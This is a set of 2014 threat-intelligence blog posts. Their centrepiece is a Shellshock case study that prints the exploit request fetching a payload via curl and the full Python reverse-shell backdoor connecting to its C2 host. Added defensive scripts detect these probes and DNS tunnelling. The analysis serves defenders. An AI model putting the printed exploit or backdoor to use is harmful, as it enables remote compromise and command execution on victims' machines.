Saturday, October 11, 2014

Red Sky Weekly: FAQ and ShellShock

At least three times every week I get asked by someone "What's the difference between Wapack Labs and Red Sky Alliance?" "Who is your target customer?" "What product do we deliver?" "What's your distribution look like?"

So let's start here...

Wapack Labs is an intelligence, research and analysis company. We sell information.

  • Wapack Labs authors, sources and sells intelligence, research and analysis. We deliver it in many forms, to many places... Red Sky Alliance/Beadwindow, the FS-ISAC, subscriptions, OEM, Threat Recon, etc. We publish in PDF, STIX, HTML, CSV, and JSON.

Red Sky Alliance is a crowdsourcing platform for cyber threat intelligence pros. Discussions are deep, and at the end of the thread, members receive a finished report with analysis of the discussion.

  • Security researchers go to Red Sky Alliance to share notes, build the story, and together, protect their networks. What happens in Red Sky Alliance, stays in Red Sky Alliance. It's private. There's no government involvement. We don't care how you interact with DSS, the regulators, or any other government organization --that's your choice. Red Sky Alliance exists to help improve your security. The private portal is ALWAYS busy. We've added university users, and just this week, another Icelandic bank.
  • For government security researchers we offer a second collaborative... Beadwindow --delivered in Threat Connect. They do not get access to the Red Sky private portal, but they do get information that they may care about. We've delivered cyber warnings, dumped credential caches and targeting, to several government agencies directly, and for others, we push stuff through Beadwindow to contacts at the 24th AF and the US MDA. None of the US Cyber Centers participate, so if you're a state, local or .gov who needs help, call us. We can help. And our stuff is UNCLASSIFIED! You can actually use it!
As an example of one of our reports, I've posted (below) a snippet from a Wapack Labs report to Red Sky Alliance members and Wapack Labs subscribers...

We published this report in its entirety last week.

We took a bit of a different approach on what seemed to be the hottest topic of the last two weeks - Shellshock. (Need information on Shellshock? Try here.)

We're looking for use cases where we might help protect against it. This is one of three case studies we'd identified that take advantage of Shellshock.

You'll see quickly that it's written for technically focused defenders. If you're a SOC analyst, incident responder, or intrusion analyst, this is for you. We have others for managers and the C-Suite, but this report is lower level. We show all of our work and sources. When done, it gets published as a PDF in whole, and (if sourced by Wapack Labs) farmed for Threat Recon.

So if you're a techie, enjoy. If you're a manager, ask your techie what it means ;) 

SHELLSHOCK CASE STUDY AND INFRASTRUCTURE

Beginning on 24 September 2014, hackers and researchers began exploiting the widely publicized Shellshock bash vulnerability, described in CVE-2014-6271. The majority of the initial activity involved mass vulnerability scanning by white hats and black hats alike. Examination of scanning activity showed a peak on September 27th with a sharp decline as of September 29th. This spike and sudden decrease may be a result of what is likely wide-scale patching of the vulnerability. Alternatively, this may mark the end of exploiting the vulnerability for reconnaissance purposes and could signal a move up the kill-chain into more targeted operations.

Legacy Scamming infrastructure re-emerges with Shellshock

A recently observed instance of Shellshock in the wild took the form of a Python-implemented backdoor hosted on google-traffic-analytics.com. Table 5 lists the observed originating IPs along with the Shellshock request:

Originating IPs:
14.163.12.119
77.29.189.34
78.15.20.81
78.161.195.166
79.136.130.110
88.253.229.151
93.139.212.67
109.227.100.189
112.156.18.40
113.171.116.163
117.218.186.16
118.172.123.111
119.130.114.154
124.123.75.68
178.120.175.81
178.121.79.68
190.49.241.220
190.82.114.190
223.206.54.26

Shellshock Request:
() { :;}; /bin/bash -c '/usr/bin/env curl -s http://google-traffic-analytics.com/cl.py > /tmp/clamd_update; chmod +x /tm

cl.py, as retrieved:

#!/usr/bin/env python


from socket import *
import os
from time import sleep
import sys


fpid = os.fork()

if fpid!=0:

    host='stats.google-traffic-analytics.com'
    port=9091
    sockobj = None
    ############################################

    sockobj = None
    recv = False

    def connect():
        try:
            sockobj=socket(AF_INET,SOCK_STREAM)
            sockobj.connect((host,port))
            return sockobj
        except:
            return False


    while True:
        while not sockobj:
            sockobj = connect()
            print "[*] Trying to reconnect..."
            sleep(1)
            if sockobj:
                print "[+] Connected"

        recv = sockobj.recv(1024)
        #print recv
        if not recv: sockobj = False; break;
        cmd = recv.strip()
        res = os.popen(cmd).read()
        if res:
            sockobj.sendall(res)

Open source research on google-traffic-analytics.com only returned one previous hit, from 2010. In August of 2010, Sucuri.net reported a wave of spam that affected more than 200K websites, including many popular sites. Investigation of the activity revealed that they were all controlled by www.google-traffic-analytics.com. The blog reported that google-traffic-analytics.com leveraged the compromised sites as part of a widespread spamming infrastructure.

Legacy Whois Record (2010):
   Registrant Contact:
   Goga Gastoyan
   Goga Gastoyan Goga Gastoyan bash@blogbuddy.ru
   +7.4957452002 fax: +7.4957452002
   Pokryshkina d.36 kv.36
   Moscow Moscow 119602
   ru

Current Record (2013):
   Admin Name: Radovanka Janekovic
   Admin Organization: Goga Gastoyan
   Admin Street: Ljubljanska 6
   Admin City: Bled
   Admin State/Province: Bled
   Admin Postal Code: 4260
   Admin Country: SI
   Admin Phone: +386.15765749
   Admin Phone Ext:
   Admin Fax: +386.15765749
   Admin Fax Ext:
   Admin Email: support@google-traffic-analytics.com


Table 5. google-traffic-analytics.com Scanning Nodes

Upon successful exploitation, a curl request is made for http://google-traffic-analytics.com/cl.py. The Python script (cl.py) is a simple yet effective backdoor that works on both Linux and Windows. It also had zero detections on VirusTotal [1]. The configured C2 address is hosted on the subdomain stats.google-traffic-analytics.com. The downloaded Python script attempts a connection to the C2 on port 9091 and, if the C2 is listening, a shell is opened to the victim.

During testing, the C2 node issued a uname -a command, which prints all available information about a Linux system [2]. [Comment: No additional activity was observed.] (See the Mitigations section for a Snort signature.)
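As a defender-side companion to the request and stager described above, here is an added example (not code from the Wapack Labs report, and not the Snort signature it refers to) that scans Apache combined-format access log lines for the "() {" prefix that CVE-2014-6271 probes carry in an HTTP header, and pulls the downloader URL and drop path out of any flagged payload for indicator sharing. The log lines are constructed around the request in Table 5; the log format, field names and regexes are assumptions about the reader's environment.

```python
#!/usr/bin/env python3
"""Flag Shellshock (CVE-2014-6271) probes in Apache combined-format access logs
and extract the downloader URLs and drop paths the payloads carry.

Added example for this write-up; not code from the Wapack Labs report. The log
format, regexes and sample lines are assumptions constructed for illustration.
"""
import re
from collections import namedtuple
from urllib.parse import unquote

# Apache "combined" format: ip ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)
# Bash function-definition prefix that vulnerable versions evaluate from any
# environment variable; the same "() {" token public IDS rules key on.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')
URL_RE = re.compile(r'https?://[^\s\'";>|]+')
# Shell redirections and chmod targets show where a stager is written to disk.
DROP_RE = re.compile(r'(?:>\s*|chmod\s+\+x\s+)(/\S+)')

Finding = namedtuple('Finding', 'ip field urls drop_paths payload')

# Constructed sample log. Line 1 wraps the request from Table 5 in a User-Agent
# header, with an originating IP from the same table; line 2 is normal browser
# traffic; line 3 is a spaced variant of the prefix in the Referer header.
SAMPLE_LOG = [
    '14.163.12.119 - - [27/Sep/2014:10:15:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" '
    '"() { :;}; /bin/bash -c \'/usr/bin/env curl -s http://google-traffic-analytics.com/cl.py > /tmp/clamd_update\'"',
    '198.51.100.7 - - [27/Sep/2014:10:15:09 +0000] "GET /index.html HTTP/1.1" 200 2048 "http://example.org/" '
    '"Mozilla/5.0 (X11; Linux x86_64) Firefox/32.0"',
    '203.0.113.5 - - [27/Sep/2014:10:16:40 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 404 221 '
    '"() { :; }; /bin/ping -c 1 203.0.113.5" "curl/7.37.0"',
]


def parse_line(line):
    """Return the log fields as a dict, or None if the line is not combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def extract_iocs(payload):
    """Pull fetch URLs and on-disk drop paths out of a flagged payload."""
    urls = URL_RE.findall(payload)
    drops = sorted({p.rstrip("';") for p in DROP_RE.findall(payload)})
    return urls, drops


def scan(lines):
    """Check request line, Referer and User-Agent of each record for the prefix."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for field in ('request', 'referer', 'agent'):
            value = unquote(rec[field])  # probes are sometimes percent-encoded
            if SHELLSHOCK_RE.search(value):
                urls, drops = extract_iocs(value)
                findings.append(Finding(rec['ip'], field, urls, drops, value))
    return findings


def summarize(findings):
    """Collapse findings into the indicator sets an analyst would share."""
    return {
        'sources': sorted({f.ip for f in findings}),
        'urls': sorted({u for f in findings for u in f.urls}),
        'drop_paths': sorted({p for f in findings for p in f.drop_paths}),
    }


if __name__ == '__main__':
    hits = scan(SAMPLE_LOG)
    for h in hits:
        print(f'{h.ip} via {h.field}: urls={h.urls} drops={h.drop_paths}')
    print(summarize(hits))
```

Run against a real access log, the summary gives the three things this case study hinges on: the scanning source addresses, the stager URL to block at the proxy, and the drop path to sweep for on exposed hosts. The prefix regex deliberately matches the token rather than one exact payload, since scanners varied the whitespace; the request line is URL-decoded first because the same token appears percent-encoded in query strings.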


The re-emergence of this domain after an apparent four-year hiatus raises the question of whether it belongs to the same attackers. A Whois history report from DomainTools lists the registrant during 2010 as "Goga Gastoyan" (bash@blogbuddy.ru); however, this changed in 2013 to the current owner, "Radovanka Janekovic". Further inspection of the records revealed Goga Gastoyan as the Admin Organization in the new record, thus confirming likely attribution to the same attackers. With the connection made to the legacy infrastructure, one could assume that this latest activity involving Shellshock could be the most recent attempt to expand the spamming network.
Table 6. Whois Record Comparison

[1] https://www.virustotal.com/en/file/052421011162421c7fbe1c9613e37b520a494034901dab1c6ee192466090421d/analysis/
[2] http://linux.about.com/library/cmd/blcmdl1_uname.htm
[3] http://blog.sucuri.net/2010/08/more-spam-google-traffic-analytics-com-cc-server.html






------------------------------------------------------

I realize this is pretty technical, but I thought it important to offer a simple slice of some of the work we do. This report is the basis for nearly everything else. These reports, when complete, are farmed for placement in Threat Recon. This information, sourced by the lab, is thought to be high confidence (although we never score anything perfect!).

This week is again, crazy. I'm on the podium at 9:00 at the FS-ISAC conference, and we've got a heck of a topic. I'm looking forward to seeing you all there.

Have a great weekend!
Jeff

Saturday, October 04, 2014

Red Sky Weekly: ShellShock

Beginning on 24 September 2014, hackers and researchers began exploiting the widely publicized ShellShock bash vulnerability, described in CVE-2014-6271. The majority of the initial activity involved mass vulnerability scanning by white hats and black hats alike. Examination of scanning activity showed a peak on September 27th with a sharp decline as of September 29th. This spike and sudden decrease may be a result of what is likely wide-scale patching of the vulnerability. Alternatively, this may mark the end of exploiting the vulnerability for reconnaissance purposes and could signal a move up the kill-chain into more targeted operations.

With so many scanning for those infected with the bash bug -both white hats and black hats, and with the vast number of machines both vulnerable and exposed, you can see how quickly researchers might get overwhelmed trying to figure out who's white and who's black! 

We took a slightly different approach. Red Sky members have been identifying the next thing.. malware that will likely exploit the bug, motivations for doing so, and working to identify potential case studies where we think we'll see ShellShock pop up in efforts to create worms, nefarious search engine optimization (SEO) schemes, and building new exploitation infrastructures.

ShellShock seems to have slowed, but it was definitely the topic of the week. It seemed to have slowed a bit, but that could simply mean that the public has been duly desensitized by all of the press.. time to move on to something else shocking...

Like this... Dealbook is reporting that ten other banks were compromised beyond those already reported.  I don't have any information on that, but I'll say... the portal has been insanely busy.

BT BT

I haven't checked user stats in a while (yeah, I'm a slacker!) so this week I jumped into the admin console to see where we're at. I get this question all of the time.. how many members are in Red Sky Alliance? 

From an organizational perspective, it's about 35 companies. From a user perspective, we have 178 active accounts. We've created many more, but we don't leave non-participating accounts active. Out of those 178 accounts, you can see the participation below. Of course we're only starting October, and March '12 was our first month in operation, but month over month we have an average of about 90 of those users who participate. That's 51% month over month participation. What about contributors? We average about 40 unique contributors every month. Some are more, some are less, but 40 unique contributors and 90 participants is a great number. How do the rest receive information? Some get subscriptions from the lab. Others simply 'follow' conversations in the portal, getting notifications and content when something is loaded. Others are managers. 51% month over month participation.. amazing.




And what about content? As you can see below, we've got about 1500 threads going. The portal has only been active for about two and a half years, and since then, 1500 threads, and over 1000 documents and reports --about 300 finished intelligence or analysis reports supplied by us, or members.


Last, I thought I'd post some of the portal areas... Incident responders corner is where you go for incident response help. We keep an area called Wild Fire for those with an immediate need. Malware Samples? That's just what it says.. submit a piece of malware for analysis --either crowdsourced, or by the Wapack Labs team. Security Intelligence, another of our popular groups is just what it says. It's forward looking intel. And Fusion Reports, with 422 documents posted, hosts discussions of finished analysis.


Crazy. The portal has been on fire. I love it. I'm heading for Houston this week to work so I may respond slowly to email, but we're always on the portal :)

Interested in joining us? If you'd like to join us, drop me a note or give me a shout.
Have a great weekend!
Jeff

Saturday, September 20, 2014

Significant threat - VPN over DNS and Are Threat Intelligence organizations really dying off?

In 2012, Wapack Labs began examining the use of VPN-over-DNS and the potential risks posed by insiders and external users of applications used to circumvent authentication mechanisms, introduce new applications (tools) into the environment, and exfiltrate sensitive information through DNS's always-open port. We've provided reporting of possible VPNs running over DNS to literally several dozen companies. Wapack Labs continues to advise organizations to closely examine their DNS name registers for VPN-over-DNS entries and monitor their DNS traffic closely; policies should also be considered to disallow the use of this application. This week, we published a detailed report on the VPN-over-DNS tool.

    Executive Summary 

    VPN-over-DNS is a free Android application available on the Google Play store, downloadable to Android telephones and also offered as a web-based application. It boasts fully integrated DNS tunneling combined with several mail clients, and while some organizations allow this application, Wapack Labs believes it to be a significant counterintelligence threat both to companies who allow it and to companies who may not be aware of its use.


    VPN-over-DNS was first released to the Google Play store on August 20th of 2012 by a French developer and is advertised as "data exfiltration, for those times when everything else is blocked." VPN-over-DNS fully qualified domain names (FQDNs) have been observed with passive DNS to resolve to a wide array of IP spaces including education, government, corporate, military, and even unassigned IP ranges. However, FQDNs resolving to an organization's IP space may not be an indication that users within that IP space are actively using VPN-over-DNS, but rather that VPN-over-DNS has been used in the past and that the tunnel may still be available for use. Wapack Labs is providing this analysis because of widespread observation in the wild as well as situational awareness of an application with insider threat potential.

    The analysis, including mitigation strategies is available to Wapack Labs customers, including Red Sky Alliance members. 
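To make "monitor its DNS traffic closely" concrete, here is an added example (not Wapack Labs' tooling, and not the mitigation strategies from their report) that scores a resolver query log for the traits DNS tunnels share: long, high-entropy subdomain labels that never repeat, and a preference for record types such as TXT and NULL that carry more data per answer. The log format, the client addresses, the domain names (tunnel.example.net is a placeholder, not an observed VPN-over-DNS domain) and the thresholds are all constructed assumptions.

```python
#!/usr/bin/env python3
"""Score a DNS resolver query log for tunnelling traffic of the VPN-over-DNS kind.

Added example; not Wapack Labs' analysis or tooling. Log format, domain names,
client addresses and thresholds are constructed assumptions for illustration.
"""
import math
from collections import Counter, defaultdict

# Record types tunnels favour because they carry more payload per answer (assumption).
RARE_QTYPES = {'TXT', 'NULL'}

# Constructed resolver log: "<client> <qname> <qtype>", one query per line.
# 10.0.0.5 browses normally; 10.0.0.9 emits encoded data as hostname labels under
# tunnel.example.net, a placeholder rather than any observed tunnel domain.
SAMPLE_QUERIES = """\
10.0.0.5 www.example.com A
10.0.0.5 mail.example.com MX
10.0.0.5 cdn.example.org A
10.0.0.9 a3f9c21d7e4b0f8a6c5d2e1b9f0a7c3d.tunnel.example.net TXT
10.0.0.9 5e8b0c4d9a2f7e1c3b6d0f4a8e2c9b7d.tunnel.example.net TXT
10.0.0.9 9c1e7a3b5d0f2c8e4a6b1d3f7e9c0a2b.tunnel.example.net TXT
10.0.0.9 2b7d9f0a4c6e8b1d3f5a7c9e0b2d4f6a.tunnel.example.net NULL
10.0.0.9 7f3a1c9e5b0d4f8a2c6e0b4d8f2a6c0e.tunnel.example.net TXT
10.0.0.9 d4b8f2a6c0e4a8c2e6b0d4f8a2c6e0b4.tunnel.example.net NULL
10.0.0.9 www.example.com A
""".splitlines()


def shannon_entropy(s):
    """Bits per character; encoded payload scores far above words like 'www'."""
    if not s:
        return 0.0
    n = len(s)
    return -sum((c / n) * math.log2(c / n) for c in Counter(s).values())


def split_name(qname):
    """Split into (subdomain, base). Base is the last two labels here; a real
    deployment would consult the public suffix list instead."""
    labels = qname.rstrip('.').lower().split('.')
    if len(labels) <= 2:
        return '', '.'.join(labels)
    return '.'.join(labels[:-2]), '.'.join(labels[-2:])


def profile(lines):
    """Group queries by (client, base domain); a tunnel lives under one base."""
    groups = defaultdict(list)
    for line in lines:
        parts = line.split()
        if len(parts) != 3:
            continue
        client, qname, qtype = parts
        sub, base = split_name(qname)
        groups[(client, base)].append((sub, qtype.upper()))
    return groups


def score_group(records):
    """Compute per-group features and count how many tunnelling indicators fire."""
    n = len(records)
    subs = [s for s, _ in records]
    stats = {
        'queries': n,
        'avg_sub_len': sum(len(s) for s in subs) / n,
        'avg_entropy': sum(shannon_entropy(s) for s in subs) / n,
        'rare_qtype_frac': sum(1 for _, t in records if t in RARE_QTYPES) / n,
        'unique_sub_frac': len(set(subs)) / n,
    }
    indicators = 0
    if stats['avg_sub_len'] >= 30:                  # labels long enough to carry data
        indicators += 1
    if stats['avg_entropy'] >= 3.0:                 # looks encoded, not like a hostname
        indicators += 1
    if stats['rare_qtype_frac'] >= 0.5:             # bulk of queries ask for TXT/NULL
        indicators += 1
    if n >= 3 and stats['unique_sub_frac'] >= 0.9:  # names never repeat, defeating caches
        indicators += 1
    stats['indicators'] = indicators
    return stats


def find_suspects(lines, min_indicators=2):
    """Return {(client, base): stats} for groups that trip enough indicators."""
    suspects = {}
    for key, records in profile(lines).items():
        stats = score_group(records)
        if stats['indicators'] >= min_indicators:
            suspects[key] = stats
    return suspects


if __name__ == '__main__':
    for (client, base), stats in find_suspects(SAMPLE_QUERIES).items():
        print(f'{client} -> {base}: {stats}')
```

Requiring two or more indicators keeps content delivery networks and anti-spam lookups, which also use long machine-generated labels, from tripping on length alone. The output is a starting list of (client, base domain) pairs to check against the DNS name register the report recommends reviewing; a base domain that is not a known business dependency and that a single host queries in this pattern is the case the report is warning about.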

    BT BT

    Are Threat Intelligence organizations really dying off?

    I heard it three times this week. Threat intelligence shops integrating into the Security Operations Centers are being killed off because managers can't seem to show ROI.

    Here's the dirty little secret... There's a model for this.. you should be able to actually track the cost of your intelligence process and make an informed make/buy decision on intelligence offerings as a service (like ours!). I'm sorry. I can't credit the source. I've worked on so many of these, but every one that I've worked on all look much the same. I start with a basic CMM maturity model and adapt it. It looks a bit like Figure 1. Click to enlarge.



    Immature infosec teams are indiscriminate feeders when it comes to intelligence. They devour everything only to realize that much of what they ate might have been tin cans, steel belted radials, and general garbage. The good stuff that they actually needed, was somewhere in there, but that bad stuff really tastes bad. During this immature phase, operations drives intelligence. Incident response analysis is mistaken for intelligence, and open sources of information are consumed without regard for quality.

    As the team moves up the maturity model, they start realizing that they want more data, better tools, and they start participating externally with smarter groups... The bird dog is training the bird dog. Now the costs REALLY go up. Learning lessons from their own environment becomes crucial, and analysis of internal data becomes key. The team finds more and more vulnerabilities, frustrating management. This costs money. The team is learning. During this phase, operations still drive intelligence, but the pendulum is beginning to swing the other way. The team starts hunting. They don't yet understand the concept of 'collecting against requirements' but they do have a standing set of information on which they maintain constant vigil...

    And then it gets better. It's when the teams become mature. Collection requirements, EEIs, and scouring the landscape for new threats become the norm. Many teams realize the value of (select) home grown and open source tools, complementing the COTS suite, and depending on the size of the team (I know BRILLIANT small teams that do very well!) they realize the value of intelligence in the SOC. This is when the team becomes an intelligence producer instead of an intelligence consumer. In fact it's almost magic. This is when intelligence feeds operations.

    Closing in on maturity, the model should start to look like figure 2 (forgive the slide!):

    So how do you know?

    Measure it!... Intel should do a couple of things for you:

    • At the strategic level, intelligence gives executives (and your marketing team!) an idea of what's coming. The more you know, and the better you plot it out, the better you'll be.
    • Intel should help with the tactical.. Not only the "what's going to hurt me tomorrow" but more priority questions like "what is going to hurt me today?" Intel should complement your SOC operation. They should know on a daily basis, what Intel thinks they should be protecting against... What's coming for us? What's coming for our industry? And what is everyone else seeing?
    • And... when you can show drops in reaction times as a result of intel, or perhaps, faster reaction times resulting from very typical intel techniques - tabletop exercises, formalized brainstorming, greybeard sessions, and white/blackhat sessions (note I didn't mention penetration or vulnerability testing??), you know you've arrived.

    When you can show results like this... and your intelligence is fast turn, very actionable, and as right as it can be, you'll have no problems communicating the value of your team to upper management.

    So start here...  if you're an immature team, and need to keep your costs low, join an open source group. Learn as much as you can. Bounce indicators off of Threat Recon (it's free to 1000 queries per month), and start looking for badness in your network. Need help? Call us.

    On another note, I'm going to start posting as Wapack Labs instead of Red Sky Alliance. The portal is strong, but we've talked with a professional marketing guy who suggests we think about branding. Much of what I blog about falls outside of the information sharing construct. When we present, we talk of intelligence services and delivering it in many forms and in many forums --Red Sky Alliance, the FS-ISAC, through a community in Threat Connect (Beadwindow is on Threat Connect), and OEM'd (Threat Recon is available through ThreatQuotient). I'll be messaging from Wapack Labs from here out. Please use my Wapack Labs email account... jstutzman@wapacklabs.com.

    Have a great weekend!
    Jeff

    It's a big day!

    When Harvard was built they waited until students created paths in the grass, to and from class, before they built the sidewalks. We developed the Threat Recon API first to see how it would be used. And today (moments ago), we launched its first web interface for single search queries! We'll build features as users request them.

    Try it out for free for 1000 queries! threatrecon.co

    Please provide feedback and feature requests to threatrecon@wapacklabs.com

    Enjoy! Jeff

Sunday, September 14, 2014

Wapack Labs Blog: Threat Recon web interface is now live!

Wapack Labs Blog: Threat Recon web interface is now live!: It's a big day! When Harvard was built they waited until students created paths in the grass, to and from class, before they built the...

Saturday, September 13, 2014

Red Sky Weekly: American Sanctions Dumps, Threat Day

I'm reading an underground carding forum where the cards (presumably) from the Home Depot breach are being sold. The card dumps are labeled "American Sanctions Dump", and currently, there appear to be 13 dump files.  I've not purchased any cards, nor have we broken any rules, but there's a pretty nice catalog showing what's for sale... and it's pretty amazing.  I apologize for the sizing of the image below but wanted to show readers what these markets actually look like. I've obfuscated the names/addresses of the issuing banks, and the name of the user who actually pulled them, but the rest is all real.

Interestingly enough, the Canadian card (shown in the first row) is selling for $51.48 while most of the US cards sell for significantly less. Not sure why. Canadians have better credit? Even more shocking was that the number of credit cards in the dump was dwarfed by the number of DEBIT cards! I'm not sure about you, but my mother always told me "don't use your debit card like a credit card! It's not safe!" ...I'll have to remember to ask my banker friends if this is really so. I'm not normally into tracking carding, there are loads of folks who do, but this was just too rich. The idea that a dump would be named "American Sanctions", so soon after I blogged about bankers being used as unprotected pawns by the Treasury department, really got my analytic juices pumping.


Here's the other thing I thought was interesting. We obtained a dump of the credential database used by a (different) forum (we didn't dump it). When we started analyzing it, we realized that the passwords used by the guys stealing cards from folks with bad passwords, were actually pretty bad themselves. No password at all was used in nearly half of the accounts in the dump, and qwerty, was easily the next most used. It went downhill fast from there. Literally thousands of them used the same password (black, qwerty, 123456, etc.). Not sure why, but that really took me by surprise. This, a fairly well known hacker forum (fairly well known meaning over 10,000 regular users), and the guys grabbing tools had both lousy passwords and bad OPSEC! Why do I care?

Years ago when I first started in the intel business, profiling attacks, victims, attackers, etc., I worked with a couple of really cool guys. My team profiled over 3000 attackers with the idea of understanding not only who these guys were, but how they operate, what their motivations were, and if, over time, they got better. The nice thing was, many of them were new. When they hacked, we saw it, knew who they were (because of their poor OPSEC) and through a combination of means, could track their growth (and attacks) throughout the years. And of course it worked. I have a feeling we're seeing the same thing on this hacker forum. Young users grabbing tools practicing terrible OPSEC. They'll get better. And we'll know. And yes, we're posting this stuff to our membership, and indicators to Threat Recon.

BT BT

We had a heck of a great time this week. I've not been to Manhattan for more than a couple of hours at a time in years. Usually I take the train in, attend a meeting or two, and take the last train out. And now, I've spent most of the last two weeks there. Last Tuesday was with the Chertoff Group (thanks Mark for the invite!) before doing cocktails with Red Sky members at the Vander Bar in midtown, and Threat Day on Wednesday at the HQ of a large Manhattan based bank. What a place.. we were on the 26th floor, facing south, right on Times Square. The presentations were incredible --one member talked about building a DNS filtering tool that he uses to analyze all of his DNS requests. Another talked about joining a botnet to analyze activity. Another detailed an APT event that they'd lived through, and yet another profiled an APT actor. Every quarter I get reenergized when I sit through Threat Day. It's not about having 2000 people in Vegas, it's about 30 really smart ones sitting in a room, watching the screen, interacting and sharing notes. And that's what we did. That's what I like about Red Sky.

I'm going to close out this week with this. A Mitre PhD just published a piece entitled "Turning the Tables on Cyber Attackers...." I especially like the section "Mixing Automated Tools with Human Analysis" (as a side note, nine providers set dozens of cookies on my browser when I opened it). That said, Mitre is now espousing the idea that humans must be involved in analysis to turn the tide on cyber attacks. Say it ain't so! Mitre called out Red Sky Alliance about a year ago as one of the better sources for human analysis, crowdsourced in our private portal. And today, the idea that humans need to look at both the forest and the trees is a massive step forward in thinking. What's old is new again. I love it. The paper in its entirety may be viewed on the Mitre site. For now, know this. It's true. Relying on open source of big data always requires further analysis. Someone MUST sort through, evaluate and prioritize findings. That's where we come in.

I especially love this paragraph:

"... Automated tools are incredibly useful, but detecting advanced cyber intruders also depends on skilled and experienced defenders. These defenders are like detectives at the scene of a crime—looking for clues, following leads, making connections, and using intuition as well as hard data to figure out who did what." 

On that, ThreatRecon.co is going well. We'll have a simple web interface up soon. Red Sky is welcoming new members, and Wapack Labs is busy. Need information? Drop us a note. Red Sky for collaboration; Wapack Labs for subscriptions; and Threat Recon (API) for up to a thousand free queries per month.

Until next time,
Have a great week!
Jeff



Saturday, September 06, 2014

Red Sky Weekly: Malware analysis leads to widely used infrastructure, 500+ domains

Normally I lead off with a bit of a story or a lesson, or a gripe. Not this week. This week I'm leading off with a piece of work that we published yesterday --a deep-dive piece of analysis on new malware being leveraged in targeted cyber crime operations. 
Working from an open sourced lead, Wapack Labs identified and analyzed a new piece of malware. We've dubbed the malware family Backdoor.KLGConfig.  Two variants were identified. One variant was observed specifically targeting credentials for a popular banking application believed used by many Financial Institutions. Further analysis exposed a wide criminal infrastructure consisting of over 500 domains.
Fusion Report 14-023 (FR14-023) was published. It's ten pages of analysis and over 20 pages of indicators. The indicators are available in Threat Recon API* with a "reference" search for "FR14-023". 
(*The Threat Recon web front end is in the works. If you need scripts for the API, you can find them here. If you prefer, we've got a down and dirty desktop application available that will also front-end Threat Recon. It ain't pretty, but for those who prefer point and click, Pizza Cat is on GitHub as well. It works well, parses darn near everything and then runs the queries through our API. Simple stuff. You can find Pizza Cat here.)
BT BT
Now I'll free form it a bit. First, I attended the AT&T Security Conference this week. This is a smaller conference in comparison, but in my opinion, and one of the reasons I've attended for the last few years is because there's something about the AT&T message. Yes, there's a bit of pitch involved, but how many places can you go to hear a full day of talks from a major carrier... folks analyzing 60Pb of data per day. It's a VERY different perspective. Endpoints = mobiles and cloud is the way of the future. And that's something that interests me immensely. Use cases, virtualization, speed, cost, benefit, and of course, my favorites, security, complexity, and new disruptive ways of doing a whole lot of things. When we're looking at endpoints going from millions to billions with the introduction of the internet of things and the only place to hold all that data is, you guessed it, in the cloud! So imagine the opportunity (for good or bad) and what that'll mean for IT and security pros. As a starter, it means you better keep up. For me? This is cool stuff! I'm planning on playing in it in the future! I want to learn as much as I can.
Next, the portal continues to be busy, and more-so, we've begun pushing Beadwindow documents into Threat Connect. That's right. If you'd like to buy Beadwindow reporting and access it through Threat Connect, give us a call. For now we'll sign you up the old fashioned way, over the phone with a credit card, but hopefully that'll change soon.
Red Sky is doing well, but we heard loud and clear that members wanted automated means of accessing intel. If you'd like to access feeds of information, we're all for it. So for that, we now push lab sourced reporting in subscription feeds, or through Threat Recon. If you're one of those users that needs (must have) a web interface, hang in there. It's coming soon and your API key will still work. If not (yesterday), we wrapped up prototyping our initial Splunk connector. Our friend Seth Bromberger authored a Python module and others have contributed connectors to CRITS, and a Maltego transform. The Python queries have been converted to Ruby for those who prefer Ruby, and the community and the number of Threat Recon users, and those who wish to integrate/OEM with it grows by the day. In fact, by next blog, I fully expect to announce the integration and availability of a Wapack Labs feed through at least two new OEM partners! 
Threat Recon can be found at threatrecon.co.
Until next week, check out Threat Recon. Give us a call if you'd like to talk OEM, and at Red Sky, when you want full content, this is where you go to get it. And quoting Tom Bodett, Come on in. We'll leave the light on for you!
Have a great weekend! Jeff

Saturday, August 30, 2014

Red Sky Weekly: At the Intersection of Financial Warfare and Cyber

Financial Warfare? Carried out in cyberspace?
http://www.newsweek.com/2014/05/02/art-financial-warfare-how-west-pushing-putins-buttons-248424.html

For months, we've been following the Russia | Ukraine conflict from the perspective of cyber as a means to an end. We've tracked and reported, both in this blog, and in more detail for our members and customers, the exploits of Cyber Berkut, Green Dragon, and suspected Russian involvement in the Ukrainian Presidential election (shortly after the US Congress passed legislation to back a US$1 billion loan guarantee, and US$50 million to help guarantee a fair election). And a few days ago, after much hand wringing, heated discussion, and finally, normalizing a would-be intelligence assessment, we published a piece that suggested that large investors and holders of long-term debt in the region are at higher risk than others for cyber attack. And we didn't talk about it, but the reality is,  those who've participated in sanctions should expect retaliation --and probably via cyber.

On that, I remembered a Bloomberg piece from July. The piece described a tool in the diplomacy toolkit that our leaders have been using for some time. Bloomberg describes it as Financial War. In May, Newsweek published a similar piece entitled "How the west is pushing Putin's buttons".

"The U.S. antiterror arsenal includes Predator drones, Tomahawk missiles and men in gray suits who target rogue regimes' finances." (http://online.wsj.com/news/articles/SB10001424127887324665604579080260261350776)

So why is a cyber guy talking about Financial War, quoting Bloomberg and the Wall Street Journal? Because financial warfare, delivered via cyber is quickly becoming the diplomatic weapon of choice. What happens when bankers uphold sanctions by blocking wire transfers and suffer retribution as a result? When the owners of the banks that are blocked from receiving money grouse to their childhood friend, and when that friend is Vladimir Putin, and when even today, they practice judo together --when all of this occurs, it should come as no surprise that the bankers that our administration used as a weapon are retaliated against.

I'm keeping it short today, but want to leave you with a couple of think points...

When bankers (or others) are retaliated against, who will protect them? What kind of regulatory action will occur when bankers stick their neck out in support of diplomacy? Will bankers be punished for being hacked? And will (should) the government offset losses to investors if/when they occur as a result? 

BT BT
  • Red Sky turned THREE this week! It's amazing, and it went by in a flash, but three years ago, Red Sky Alliance Corporation was born. 
  • We've begun populating reporting in the Beadwindow portal in Threat Connect.
  • ...And the analysis engine has been in overtime. The portal is busy --it has been all summer, and going into Labor Day weekend, for some reason, we've started getting calls for new memberships.
